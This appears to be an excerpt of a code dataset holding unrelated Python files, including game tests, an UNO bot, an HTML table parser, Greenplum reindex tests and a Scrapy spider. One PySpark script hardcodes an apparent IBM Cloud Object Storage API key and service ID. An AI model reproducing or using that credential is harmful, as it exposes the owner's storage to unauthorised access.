position[\"fen\"]\n result = position[\"result\"]\n board = ataxx.Board(fen)\n\n # Check the result is right\n self.assertTrue(board.result() == result)\n\n # Check that if we double pass (null move) we get a decisive result\n if result == \"*\":\n board.makemove(ataxx.Move.null())\n board.makemove(ataxx.Move.null())\n self.assertTrue(board.result() != \"*\")\n\n def test_counters(self):\n positions = [\n {\"move\": \"g1f3\", \"fen\": \"x5o/7/7/7/5x1/7/o6 o 1 1\"},\n {\"move\": \"a1c1\", \"fen\": \"x5o/7/7/7/5x1/7/2o4 x 2 2\"},\n {\"move\": \"b6\", \"fen\": \"x5o/1x5/7/7/5x1/7/2o4 o 0 2\"},\n {\"move\": \"c1e3\", \"fen\": \"x5o/1x5/7/7/4oo1/7/7 x 0 3\"},\n {\"move\": \"0000\", \"fen\": \"x5o/1x5/7/7/4oo1/7/7 o 1 3\"},\n ]\n\n board = ataxx.Board();\n\n for position in positions:\n move = position[\"move\"]\n fen = position[\"fen\"]\n\n board.makemove(ataxx.Move.from_san(move))\n\n self.assertTrue(board.get_fen() == fen)\n\n def test_draws(self):\n # Check nullmove draw conditions\n board = ataxx.Board()\n board.makemove(ataxx.Move.null())\n board.makemove(ataxx.Move.null())\n self.assertTrue(board.gameover())\n self.assertFalse(board.fifty_move_draw())\n self.assertFalse(board.max_length_draw())\n\n # Check double move draw conditions\n board = ataxx.Board()\n for i in range(500):\n if i < 50:\n self.assertFalse(board.gameover())\n self.assertFalse(board.fifty_move_draw())\n self.assertFalse(board.max_length_draw())\n elif i < 400:\n self.assertTrue(board.gameover())\n self.assertTrue(board.fifty_move_draw())\n self.assertFalse(board.max_length_draw())\n else:\n self.assertTrue(board.gameover())\n self.assertTrue(board.fifty_move_draw())\n self.assertTrue(board.max_length_draw())\n\n if i % 2 == 0:\n board.makemove(ataxx.Move.from_san(\"g1g3\"))\n board.makemove(ataxx.Move.from_san(\"a1a3\"))\n else:\n board.makemove(ataxx.Move.from_san(\"g3g1\"))\n board.makemove(ataxx.Move.from_san(\"a3a1\"))\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":14542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"342643552","text":" \r\nimport ibmos2spark\r\nimport os\r\nimport sys\r\nfrom pyspark.sql import DataFrame\r\nfrom pyspark.sql import functions as F\r\nfrom pyspark.sql.types import IntegerType \r\n# @hidden_cell\r\ncredentials = {\r\n 'endpoint': 'https://s3-api.us-geo.objectstorage.service.networklayer.com',\r\n 'service_id': 'iam-ServiceId-483acb8d-7120-4eae-a2be-d4f9e0af1b6d',\r\n 'iam_service_endpoint': 'https://iam.cloud.ibm.com/oidc/token',\r\n 'api_key': 'jb7eGpeGsDq4s_rDX_cymC3745z3_3wbACksaxigtwcv'\r\n}\r\n\r\nconfiguration_name = 'os_592857e215ab4400b1f0cfeeddc12484_configs'\r\ncos = ibmos2spark.CloudObjectStorage(sc, credentials, configuration_name, 'bluemix_cos')\r\n\r\nfrom pyspark.sql import SparkSession\r\nspark = SparkSession.builder.getOrCreate()\r\n#Testing \r\ndf = spark.read\\\r\n .format('org.apache.spark.sql.execution.datasources.csv.CSVFileFormat')\\\r\n .option('header', 'true')\\\r\n .load(cos.url('Fb_testdata_model.csv', 'trinityfb-donotdelete-pr-p7zcpkgojehbsq'))\r\n\r\ndf.show()\r\n\r\n\r\ncasted_df =df.withColumn(\"Tenure\",F.col('Tenure').cast(IntegerType()))\\\r\n .withColumn(\"Age\",F.col('Age').cast(IntegerType()))\\\r\n .withColumn(\"Friends\",F.col('Friends').cast(IntegerType()))\\\r\n .withColumn(\"Views\",F.col('Views').cast(IntegerType()))\\\r\n .withColumn(\"Likes\",F.col('Likes').cast(IntegerType()))\r\ncasted_df.printSchema()\r\n\r\n\r\n\r\n#input_df.show()\r\n\r\n#Age Score UDF\r\ndef age_score(age):\r\n if 0<=age<=21:\r\n return 7\r\n if 22<=age<=24:\r\n return 8\r\n if 25<=age<=26:\r\n return 10\r\n if 27<=age<=29:\r\n return 9\r\n if 30<=age<=32:\r\n return 6\r\n if 33<=age<=34:\r\n return 5\r\n if 35<=age<=37:\r\n return 4\r\n if 38<=age<=45:\r\n return 3\r\n if 46<=age<=49:\r\n return 2\r\n if age>=50:\r\n return 1\r\n#network_connection_Score \r\ndef friends_score(x):\r\n if 0<=x<=20:\r\n return 1\r\n if 21<=x<=100:\r\n return 2\r\n if 101<=x<=140:\r\n return 3\r\n if 141<=x<=200:\r\n return 4\r\n if 201<=x<=400:\r\n return 5\r\n if 401<=x<=500:\r\n return 6\r\n if 501<=x<=1000:\r\n return 7\r\n if 1001<=x<=2000:\r\n return 8\r\n if 2001<=x<=5000:\r\n return 9\r\n if x>=5000:\r\n return 10\r\n#Likes_Score\r\ndef like_view_score(x):\r\n if 0<=x<=1000:\r\n return 1\r\n if 1001<=x<=5000:\r\n return 2\r\n if 5001<=x<=10000:\r\n return 3\r\n if 10001<=x<=30000:\r\n return 4\r\n if 30001<=x<=50000:\r\n return 5\r\n if 50001<=x<=80000:\r\n return 6\r\n if 80001<=x<=100000:\r\n return 7\r\n if 100001<=x<=150000:\r\n return 8\r\n if 150001<=x<=200000:\r\n return 9\r\n if x>=200000:\r\n return 10\r\n\r\n#Age Score UDF\r\ndef tenure_score(age):\r\n if 0<=age<=21:\r\n return 1\r\n if 22<=age<=24:\r\n return 2\r\n if 25<=age<=26:\r\n return 3\r\n if 27<=age<=29:\r\n return 4\r\n if 30<=age<=32:\r\n return 5\r\n if 33<=age<=34:\r\n return 6\r\n if 35<=age<=37:\r\n return 7\r\n if 38<=age<=45:\r\n return 8\r\n if 46<=age<=49:\r\n return 9\r\n if age>=50:\r\n return 10\r\n\r\n\r\n\r\n\r\n\r\n\r\nspark.udf.register(\"age_py\",age_score)\r\nspark.udf.register(\"friends_py\",friends_score)\r\nspark.udf.register(\"like_view_py\",like_view_score)\r\nspark.udf.register(\"tenure_py\",tenure_score)\r\n\r\n\r\n\r\nscore_df=casted_df.select(F.col('UserId'),F.col('Name'),F.col('Gender'),F.col('Age'),F.col('City'),F.col('Friends'),F.col('Likes'),F.col('Views'),F.col('Tenure'),F.expr(\"age_py(Age)\").alias('age_score')\\\r\n ,F.expr(\"tenure_py(Tenure)\").alias('tenure_score')\\\r\n ,F.expr(\"like_view_py(Likes)\").alias('like_score')\\\r\n ,F.expr(\"like_view_py(Views)\").alias('view_score')\\\r\n ,F.expr(\"friends_py(Friends)\").alias('friends_score')) \r\nfinal_df=score_df.select(F.col('*'))\\\r\n .withColumn(\"FB_score\",((F.col(\"age_score\") + F.col(\"tenure_score\") + F.col(\"like_score\") + F.col(\"view_score\") +F.col(\"friends_score\"))/5*100).alias('overall_score'))\r\n\r\nfinal_df.write\\\r\n .format('org.apache.spark.sql.execution.datasources.csv.CSVFileFormat')\\\r\n .option('header', 'true')\\\r\n .save(cos.url('fb_scored_pythontest.csv', 'trinityfb-donotdelete-pr-p7zcpkgojehbsq'))\r\n","sub_path":"Linked_in_Anlaysis.py","file_name":"Linked_in_Anlaysis.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"3112432","text":"from dataclasses import dataclass\nfrom scipy.stats import norm\nimport sys\n\ndef main():\n # print command line arguments\n for arg in sys.argv[1:]:\n print(arg)\n x=32\n mus=[10,15,28,30,32,40,45]\n cgs=[1,2,3,4,5]\n for mu in mus:\n print(\"{},{:.8f}\".format(mu,norm(mu,cgs[0]).pdf(x)))\n print(\"\\n\\n\")\n for cg in cgs:\n print(\"{},{:.8f}\".format(cg,norm(mus[4],cg).pdf(x)))\n\nif __name__ == \"__main__\":\n main()\n\n\n","sub_path":"temp/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"77758737","text":"from player import Player\nimport functions\nfrom random import randint\nfrom collections import Counter\n\nclass BotPlayer(Player):\n def __init__(self, name):\n Player.__init__(self, name)\n\n def play(self, game):\n wild_color = (\"\\033[31m\" + \"W\" + \"\\033[0m\" + \n \"\\033[32m\" + \"i\" + \"\\033[0m\" + \n \"\\033[33m\" + \"l\" + \"\\033[0m\" + \n \"\\033[34m\" + \"d\" + \"\\033[0m\")\n\n for card in self.hand:\n check = functions.check_if_card_can_be_placed(card, game.pile[0], game.declared_color)\n\n if check:\n if len(self.hand) == 2:\n uno_call_chance = randint(0, 10)\n if uno_call_chance < 8:\n print(\"UNO!\")\n for player in game.players:\n if player == self:\n continue\n\n else:\n player.uno_calls.append(self.name) \n\n else:\n print(\"Oops! I forgot to call out UNO...\")\n self.draw_cards(2, game)\n\n game.pile.insert(0, self.hand.pop(self.hand.index(card)))\n\n if card.color == wild_color:\n hand_colors = [card.color for card in self.hand]\n max_color = Counter(hand_colors).most_common(1)[0][0]\n\n if max_color == wild_color:\n max_color = Counter(hand_colors).most_common(2)[1][0]\n\n game.declared_color = max_color\n\n print(\"I'm placing a {0} and I'm gonna choose the color {1}\".format(functions.format_card(card), max_color))\n return\n\n print(\"I'm placing a {0}\".format(functions.format_card(card)))\n return\n\n print(\"I can't place any cards, I'm gonna draw one...\")\n self.draw_cards(1, game)\n\n drawn_card = self.hand[-1]\n\n if functions.check_if_card_can_be_placed(drawn_card, game.pile[0], game.declared_color):\n print(\"Yes! Got a {0}\".format(functions.format_card(drawn_card)))\n game.pile.insert(0, self.hand.pop(-1))\n if drawn_card.color == wild_color:\n hand_colors = [card.color for card in self.hand]\n max_color = Counter(hand_colors).most_common(1)[0][0]\n game.declared_color = max_color\n\n print(\"I'm gonna choose the color {0}\".format(max_color))\n\n else:\n print(\"I can't place the card that I got...\")\n","sub_path":"bot_player.py","file_name":"bot_player.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"635422958","text":"#-*- coding: utf-8 -*-\n#\n# IEDPackageTableDataSource.py\n# AutoDMG\n#\n# Created by Per Olofsson on 2013-10-22.\n# Copyright (c) 2013 University of Gothenburg. All rights reserved.\n#\n\nfrom Foundation import *\nfrom AppKit import *\nimport os.path\n\n\nclass IEDPackageTableDataSource(NSObject):\n \n def init(self):\n self = super(IEDPackageTableDataSource, self).init()\n if self is None:\n return None\n \n self.packages = list()\n self.pkgImage = NSImage.imageNamed_(u\"Package\")\n \n return self\n \n def packagePaths(self):\n return [pkg[u\"path\"] for pkg in self.packages]\n \n def numberOfRowsInTableView_(self, tableView):\n return len(self.packages)\n \n def tableView_objectValueForTableColumn_row_(self, tableView, column, row):\n return self.packages[row][column.identifier()]\n \n def tableView_setObjectValue_forTableColumn_row_(self, tableView, obj, column, row):\n self.packages.insert(row, obj)\n \n def tableView_validateDrop_proposedRow_proposedDropOperation_(self, tableView, info, row, operation):\n if info.draggingSource() == tableView:\n return NSDragOperationMove\n pboard = info.draggingPasteboard()\n paths = pboard.propertyListForType_(NSFilenamesPboardType)\n if not paths:\n return NSDragOperationNone\n for path in paths:\n name, ext = os.path.splitext(path)\n if ext.lower() not in (u\".pkg\", u\".mpkg\"):\n return NSDragOperationNone\n return NSDragOperationCopy\n \n def tableView_acceptDrop_row_dropOperation_(self, tableView, info, row, operation):\n pboard = info.draggingPasteboard()\n # If the source is the tableView, we're reordering packages within the\n # table and the pboard contains the source row indices.\n if info.draggingSource() == tableView:\n indices = [int(i) for i in pboard.propertyListForType_(NSStringPboardType).split(u\",\")]\n for i in indices:\n self.packages[row], self.packages[i] = self.packages[i], self.packages[row]\n else:\n # Otherwise it's a list of paths to add to the table.\n paths = pboard.propertyListForType_(NSFilenamesPboardType)\n for i, path in enumerate(paths):\n package = {\n u\"image\": NSWorkspace.sharedWorkspace().iconForFile_(path),\n u\"path\": path,\n u\"name\": os.path.basename(path),\n }\n self.packages.insert(row + i, package)\n tableView.reloadData()\n return True\n \n def tableView_writeRowsWithIndexes_toPasteboard_(self, tableView, rowIndexes, pboard):\n # When reordering packages put a list of indices as a string onto the pboard.\n indices = list()\n index = rowIndexes.firstIndex()\n while index != NSNotFound:\n indices.append(index)\n index = rowIndexes.indexGreaterThanIndex_(index)\n pboard.declareTypes_owner_([NSStringPboardType], self)\n pboard.setPropertyList_forType_(u\",\".join(unicode(i) for i in indices), NSStringPboardType)\n return True\n\n\n","sub_path":"AutoDMG/IEDPackageTableDataSource.py","file_name":"IEDPackageTableDataSource.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"224231097","text":"class Employer:\r\n\tdef __init__(self,name,surname,money):\r\n\t\tself.name = name\r\n\t\tself.surname = surname\r\n\t\tself.money = money \r\n\t\tself.mail = self.surname+\".\"+self.name+\"@hotmail\"\r\n\r\n\tdef fullname(self):\r\n\t\treturn \"{} {}\".format(self.name,self.surname)\r\n\r\nemployee1 = Employer(\"Sansa\",\"Stark\",5000)\r\n\r\nprint(employee1.name)\r\nprint(employee1.fullname())","sub_path":"class_instance.py","file_name":"class_instance.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"178387554","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"HTML Table parser\"\"\"\n\nimport re\nfrom itertools import product\nfrom functools import reduce\nfrom urllib.request import urlopen\nfrom urllib.parse import quote\nfrom bs4 import BeautifulSoup\n\n\nclass Table:\n \"\"\"\n Table Tag Parser\n This class analyzes row and col of Table and\n convert HTML Table to TSV(Tab-Separated Values).\n \"\"\"\n def __init__(self, soup):\n self.soup = soup\n self.table_map = {}\n self.table_size = (0, 0)\n self._parse_table(soup)\n\n def _parse_table(self, table):\n if table.thead:\n thead_trs = table.thead.find_all(\"tr\", recursive=False)\n self._add_cells(thead_trs, header_flag=True)\n tbody = table.tbody if table.tbody else table\n tbody_trs = tbody.find_all(\"tr\", recursive=False)\n self._add_cells(tbody_trs, header_flag=False)\n\n def _add_cells(self, trs, header_flag):\n re_td = re.compile(\"t[hd]\")\n x = 0\n for y, tr in enumerate(trs, start=self.table_size[0]):\n x = 0\n tds = tr.find_all(re_td, recursive=False)\n for td in tds:\n while (y, x) in self.table_map:\n x += 1\n cell = Cell(td, header_flag)\n for p in product(range(y, y + cell.dy),\n range(x, x + cell.dx)):\n self.table_map[p] = cell\n x += cell.dx\n self.table_size = (self.table_size[0] + len(trs), x)\n\n def get_strings(self, with_header=True):\n old_y = 0\n keys = sorted(self.table_map)\n words = []\n lines = []\n for y, x in keys:\n v = self.table_map[(y, x)]\n if not with_header and v.is_header():\n continue\n if y == old_y:\n words.append(str(v))\n else:\n lines.append(\"\\t\".join(words))\n if y - old_y > 1:\n lines.append(\"\\n\" * (y - old_y - 2))\n words = [str(v)]\n old_y = y\n if words:\n lines.append(\"\\t\".join(words))\n\n return \"\\n\".join(lines)\n\n def get_title(self, length=30):\n \"\"\"\n return table title whose length is limitied to 'length'.\n If length = 0, return full-long title.\n \"\"\"\n if length != 0:\n return_txt = self.get_title(length=0)\n if len(return_txt) <= length:\n return return_txt\n return return_txt[0:length-3] + \"...\"\n if self.soup.caption:\n return reduce(lambda x, y: x + y,\n list(self.soup.caption.stripped_strings), \"\")\n if (self.table_map[(0, 0)].is_header() and\n self.table_map[(0, 0)].dx == self.table_size[1]):\n return reduce(\n lambda x, y: x + y,\n list(self.table_map[(0, 0)].soup.stripped_strings),\n \"\"\n )\n target = self.soup.previous_sibling\n while target is not None and target.name != \"table\":\n if target.name is not None and re.match(r'h[1-6]$', target.name):\n return reduce(lambda x, y: x + y,\n list(target.stripped_strings), \"\")\n target = target.previous_sibling\n return \"\\t\".join([str(self.table_map[(0, x)])\n for x in range(0, self.table_size[1])])\n\n def __str__(self):\n return self.get_strings()\n\n\nclass Cell:\n \"\"\"\n Table Data Parser\n This class extracts \"TD\" tag contents.\n \"\"\"\n def __init__(self, soup, in_thead=False):\n self.soup = soup\n self.dx = int(soup.get(\"colspan\", 1))\n self.dy = int(soup.get(\"rowspan\", 1))\n self.in_thead = in_thead\n\n def __str__(self):\n if not hasattr(self, \"_string_cache\"):\n self._string_cache = reduce(lambda x, y: x + y,\n list(self.soup.stripped_strings), \"\")\n return self._string_cache\n\n def is_header(self):\n return self.in_thead or self.soup.name == 'th'\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser(description='HTML Table Parser')\n parser.add_argument('url', help='target URL')\n group = parser.add_mutually_exclusive_group()\n group.add_argument('-a', '--all', action='store_true',\n help='show all table', default=False)\n group.add_argument('-n', '--table-num', type=int, metavar='num',\n action='append', help='table number', default=[])\n parser.add_argument('--without-contents', action='store_false',\n dest=\"contents_flag\",\n help='dosen\\'t show table contents')\n parser.add_argument('--dump', action='store_true',\n help='dump html source.')\n parser.add_argument('--with-header', action='store_true',\n default=True, dest=\"header\", help='with header')\n parser.add_argument('--without-header', action='store_false',\n dest=\"header\", help='without header')\n args = parser.parse_args()\n if args.contents_flag and not args.all and not args.table_num:\n args.contents_flag = False\n args.all = True\n\n def urlencode_ch(m):\n t = m.groups()\n if t[0]:\n return t[0]\n return quote(t[1])\n args.url = re.sub(r\"\"\"([A-Za-z0-9._~!$&'()*+,;?=:@-]|\"\"\"\n r\"\"\"%[A-Fa-f0-9]{2})|(.)\"\"\",\n urlencode_ch, args.url)\n\n with urlopen(args.url) as f:\n text = f.read()\n text = text.replace(b\"\\n\", b\"\").replace(b\"\\r\", b\"\")\n soup = BeautifulSoup(text, \"lxml\")\n tables = soup.find_all(\"table\")\n for count, table in enumerate(tables, 1):\n if not args.all and count not in args.table_num:\n continue\n t = Table(table)\n if len(tables) != 1:\n print(\"Table %d: %s\" % (count, t.get_title()))\n if args.dump:\n print(table)\n elif args.contents_flag:\n print(t.get_strings(with_header=args.header))\n print()\n\n return 0\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main())\n","sub_path":"tableparser.py","file_name":"tableparser.py","file_ext":"py","file_size_in_byte":6262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"596027595","text":"\"\"\"\nCopyright (c) 2004-Present Pivotal Software, Inc.\n\nThis program and the accompanying materials are made available under\nthe terms of the under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport os\nimport socket\nimport tinctest\nimport unittest2 as unittest\nfrom tinctest.lib import local_path\nfrom mpp.gpdb.tests.storage.lib import Database\nfrom mpp.models import MPPTestCase\nfrom tinctest.models.scenario import ScenarioTestCase\nfrom mpp.gpdb.tests.storage.lib.sql_isolation_testcase import SQLIsolationTestCase\nfrom mpp.lib.PSQL import PSQL\nfrom mpp.gpdb.tests.storage.vacuum.reindex import Reindex\n\nclass ReindexTestCase(ScenarioTestCase, MPPTestCase):\n\n def test_reindex_scenarios(self):\n '''\n This test currently verifies following situations --\n 1. Table dropped during reindex database should not fail. Drop table transaction will either succeed or\n block. But in any case reindex database will proceed without failure.\n 2. Reindex table should be able to retain the system in consistent mode even if a new index is added\n concurrently.\n '''\n\n list_setup = []\n list_setup.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_stp\")\n self.test_case_scenario.append(list_setup, serial=True)\n\n list_drop_table_reindex_db = []\n list_drop_table_reindex_db.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_db\")\n list_drop_table_reindex_db.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.drop_obj\")\n self.test_case_scenario.append(list_drop_table_reindex_db, serial=False)\n\n list_add_index_reindex_table = []\n list_add_index_reindex_table.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_rel\")\n list_add_index_reindex_table.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.add_index\")\n self.test_case_scenario.append(list_add_index_reindex_table, serial=False)\n\n list_verify = []\n list_verify.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_verify\")\n self.test_case_scenario.append(list_verify, serial=True)\n\n def test_reindex_gpFastSequence(self):\n '''\n This is to test gp_fastsequence reindex while insert is happening in other relations\n STEPS:\n 1. Create aoco table with index (setup_gpfastseq)\n 2. In TXN 1 Inject fault to suspend reindex_relation and issue reindex gp_fastsequence (reindex_gpfastseq)\n 3. In TXN 2 Check that the fault injected in TXN 1 is set and then insert 100 rows in table created in step 1.\n (insert_tup_gpfastseq). This step will wait as it needs to update gp_fastsequence last_sequence for the aoco\n on the Master relation and TXN 1 has placed a lock on gp_fastsequence table.\n 4. In TXN 3 Reset the reindex_relation fault so that TXN 1 and TXN 2 can finish (reset_fault)\n 5. Verify and validate that relfilenodes (for gp_fastsequence and the aoco tables) are synced on all segments\n and gp_fastsequence last_sequence is calculated correctly after each insert for aoco relation on all\n segments (verify_gpfastseq)\n '''\n\n list_setup = []\n list_setup.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.setup_gpfastseq\")\n self.test_case_scenario.append(list_setup, serial=True)\n\n list_insert_tup_reindex_gpfastsequence = []\n list_insert_tup_reindex_gpfastsequence.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reindex_gpfastseq\")\n list_insert_tup_reindex_gpfastsequence.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.insert_tup_gpfastseq\")\n list_insert_tup_reindex_gpfastsequence.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.reset_fault\")\n self.test_case_scenario.append(list_insert_tup_reindex_gpfastsequence, serial=False)\n\n list_verify = []\n list_verify.append(\"mpp.gpdb.tests.storage.vacuum.reindex.scenario.test_scenario.verify_gpfastseq\")\n self.test_case_scenario.append(list_verify, serial=True)\n\nclass ReindexConcurrencyTestCase(SQLIsolationTestCase):\n '''\n Test for REINDEX (index/table/system/database) with various concurrent transactions.\n Includes bitmap/btree/GiST tys of indexes\n For storage type AO/AOCO/Heap Relations\n '''\n sql_dir = 'concurrency/sql/'\n ans_dir = 'concurrency/expected'\n out_dir = 'concurrency/output/'\n","sub_path":"src/test/tinc/tincrepo/mpp/gpdb/tests/storage/vacuum/reindex/test_reindex.py","file_name":"test_reindex.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"453943081","text":"from conans import ConanFile, CMake\n\nclass Chess(ConanFile):\n requires = (\"glm/0.9.9.7@_/_\",\n \"glew/2.1.0@bincrafters/stable\",\n \"glfw/3.3.2@bincrafters/stable\",\n # Defining zlib explicitly resolves dependency conflict\n \"zlib/1.2.11@_/_\",\n )\n generators = \"cmake\"\n\n def build(self):\n cmake = CMake(self)\n cmake.configure()\n cmake.build()\n","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"482374173","text":"\n#menuzinho das opções\nprint(\"0- sair\")\nprint(\"1-adicionar produto\")\nprint(\"2-remover produto\")\nprint(\"3-modificar produto\")\nprint(\"4-mostrar estoque completo\")\n\n\n#estoque da loja\nestoque={}\n\n#definindo escolha do menu\nescolha=1\n\n#enquanto não escolherem 0, o programa fica repetindo\nwhile escolha!=\"0\":\n escolha=input(\"faça sua escolha:\")\n \n#opção de menu 1\n if escolha==\"1\":\n produto=input(\"nome do produto:\")\n while produto in estoque:\n print (\"este produto já existe\")\n produto=input(\"nome do produto:\")\n quantidade_inicial=int(input(\"quantidade:\"))\n preco = float(input('valor unitário:'))\n while quantidade_inicial<0:\n print (\"a quantidade inicial não pode ser negativa\")\n quantidade_inicial=int(input(\"quantidade:\"))\n preco = float(input('valor unitário:'))\n caracteristica={\"quantidade\":quantidade_inicial,'valor unitario':preco}\n estoque[produto]=caracteristica\n print (\"{0} {1}s foram adicionadas, custando {2} reais cada\".format(quantidade_inicial, produto,preco))\n\n#opção de menu 2\n elif escolha == \"2\":\n remover= input(\"Digite o nome do produto que deseja remover: \")\n while remover not in estoque:\n print (\"Produto não encontrado\")\n remover = input (\"Digite um produto válido: \")\n if remover in estoque:\n del estoque [remover]\n print (\"{0} foi removido\".format(remover))\n \n#opção de menu 3\n elif escolha == \"3\":\n produto=input('digite o nome do produto: ')\n while produto not in estoque:\n print ('elemento não encontrado')\n produto= input (\"digite o nome do produto: \")\n valor_adicional = int(input('quantidade do produto: '))\n estoque[produto]['quantidade'] += valor_adicional\n print ('novo estoque de {0} é {1}'.format(produto,estoque[produto]['quantidade']))\n \n\n#opção de menu 4\n elif escolha == \"4\":\n print(\"Estoque:\")\n for chave, valor in estoque.items():\n print (\"{0} : {1} , {2}\".format(chave,valor[\"quantidade\"], valor ['valor unitario']))\n elif escolha != \"0\":\n print (\"Comando inválido\")\n\nprint (\"Até a próxima, amigo!\")\n","sub_path":"item3.py","file_name":"item3.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216038104","text":"from django.shortcuts import render\nfrom .models import Slider\nfrom adoption.models import Adoption\nfrom caretaker.models import Caretaker\nfrom ngo.models import Ngo\nfrom vets.models import Vets\n\n# Create your views here.\n\ndef home(request):\n sliders = Slider.objects.all()\n adoption = Adoption.objects.order_by('-created_date')\n caretaker = Caretaker.objects.order_by('-created_date')\n ngo = Ngo.objects.order_by('-created_date')\n vets = Vets.objects.order_by('-created_date')\n\n\n data = {\n 'sliders' : sliders,\n 'adoption' : adoption,\n 'caretaker' : caretaker,\n 'ngo' : ngo,\n 'vets' : vets\n }\n\n return render(request, 'webpages/home.html', data)\n\n\ndef about(request):\n return render(request, 'webpages/about.html')\n\n\ndef contact(request):\n return render(request, 'webpages/contact.html')","sub_path":"AniWorld/webpages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"22549936","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jul 16 14:29:29 2018\n\n@author: Mjr\n\"\"\"\n\n\nclass Twosum():\n\n def __init__(self):\n self.target_count = 0\n self.data = []\n\n def addData(self, pt):\n self.data.append(pt)\n\n def TwoSum(self, lower, upper):\n for sum_cr in range(lower, upper+1, 1):\n print('current iteration:', sum_cr)\n hash_table = {}\n for i in self.data:\n if (sum_cr - i in hash_table and sum_cr - i != i):\n self.target_count += 1\n print('current target count:', self.target_count)\n break\n hash_table[i] = i\n\n\nmike = Twosum()\n\ndat = open('prob-2sum.txt', 'r')\n\nfor line in dat.readlines():\n mike.addData(int(line))\n\nmike.TwoSum(-10000, 10000)\n\nprint('my answer is: ', mike.target_count)\n","sub_path":"python/anaconda/spyder/algorithms/archive/2Sum.py","file_name":"2Sum.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392044177","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a OurCareerPages spider created on top of the ATSSpider\nscrapy crawl ourcareerpages -a url=\"http://agc-sd.ourcareerpages.com\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://agc-sd.ourcareerpages.com\n http://simoncontractors2.ourcareerpages.com\n http://mm-corporate-hourly.ourcareerpages.com\n http://asplundh.ourcareerpages.com\n\"\"\"\n\nfrom json import loads\nfrom re import compile\n\nfrom scrapy.http import Request\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveEmptyTags\n\n\nclass OurCareerPages(ATSSpider):\n\n name = \"ourcareerpages\"\n url_fragmentanchor = \"/WebServices/BDHWebServiceDirector.asmx/ProcessRequest\"\n start_url = \"\"\n subdomain_re = compile(\"//(.*?)\\.\")\n subdomain = \"\"\n\n def __init__(self, *args, **kwargs):\n if 'url' in kwargs:\n self.start_url = kwargs['url']\n sub_res = self.subdomain_re.search(kwargs['url'])\n if sub_res:\n self.subdomain = sub_res.group(1)\n\n super(OurCareerPages, self).__init__(*args, **kwargs)\n\n def start_requests(self):\n query = '{\"className\":\"HostedCareerPage\",\"methodName\":\"GetSearchResults\",\"methodParms\":{\"searchBy\":{\"AND\":{\"state_abbrev\":\"\",\"city\":\"\",\"skill_tags\":\"\"},\"LIKE\":{\"description\":\"\",\"job_title\":\"\"},\"IN\":{\"postal_code\":\"\"},\"COUNTY\":{\"postal_code\":\"\"}},\"ccpCode\":\"%s\"}}' % self.subdomain\n headers = {\n \"X-Requested-With\": \"XMLHttpRequest\",\n \"Accept\": \"application/json; charset=utf-8\",\n \"Connection\": \"keep-alive\",\n \"Content-Type\": \"application/json; charset=UTF-8\"\n }\n yield Request(\n self.start_urls[0],\n method='POST',\n body=query,\n headers=headers,\n callback=self.parse\n )\n\n def parse(self, response):\n try:\n json_res = loads(response.body)\n except Exception:\n # expected json response wad not found\n return\n\n jobs = json_res.get(\"d\", {}).get(\"retVals\", {}).get(\"job\", {})\n for job in jobs:\n url = \"%s/JobView.aspx?id=%s\" % (\n 